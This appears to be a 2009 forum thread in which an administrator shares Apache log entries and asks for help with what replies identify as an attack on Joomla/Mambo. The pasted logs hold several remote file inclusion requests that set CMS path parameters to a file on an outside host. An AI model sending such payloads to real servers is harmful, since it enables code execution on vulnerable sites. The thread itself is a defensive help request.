Hello Group... Tonight I was looking over various logs in one of my servers and found when running 'tail -f /var/log/apache2/access.log' I see what appears to be an attack !!!??? The output of 'tail -f /var/log/apache2/access.log' Code: localhost.localdomain - - [26/Mar/2009:13:07:10 -0700] "GET /?reflect_base=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805" localhost.localdomain - - [26/Mar/2009:13:09:50 -0700] "GET /?option=com_zoom&Itemid=38//%3fmosConfig_absolute_path=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805" localhost.localdomain - - [26/Mar/2009:13:09:50 -0700] "GET /?mosConfig_absolute_path=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805" localhost.localdomain - - [26/Mar/2009:13:11:15 -0700] "GET /?path%255Bdocroot%255D=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805" localhost.localdomain - - [26/Mar/2009:13:15:11 -0700] "GET /?path%255Bdocroot%255D=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805" localhost.localdomain - - [26/Mar/2009:13:15:12 -0700] "GET /?path%255Bdocroot%255D=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805" localhost.localdomain - - [26/Mar/2009:13:17:38 -0700] "GET /?reflect_base=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805" localhost.localdomain - - [26/Mar/2009:13:17:39 -0700] "GET /?reflect_base=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805" localhost.localdomain - - [26/Mar/2009:13:24:39 -0700] "GET /?option=com_content&v...i-asterisk-1-6-x&Itemid=6//%3fmosConfig_absolute_path=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805" localhost.localdomain - - [26/Mar/2009:13:24:40 -0700] "GET /?mosConfig_absolute_path=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805" Thanking you in advance for your help. Best Regards
Looks like an attack to joomla or similar cms? When googling for some of the parameter, e.g. mosConfig_absolute_path or reflect_base it looks like moscms or joomla.
Thank you for the replies... Robilaur: I searched the box for 'id.txt' but this file is non-existent. Also, how would I go about banning the user? I am not seeing any particular IP he is coming from, only 'localhost.localdomain'? Ben: Hmm, I never did personally like Joomla and the application has yet to been used so I just removed it entirely from the server. But I would still like to know how to ban the 'user' responsible though, your suggestions are very welcome. Thank you for your help... Best Regards
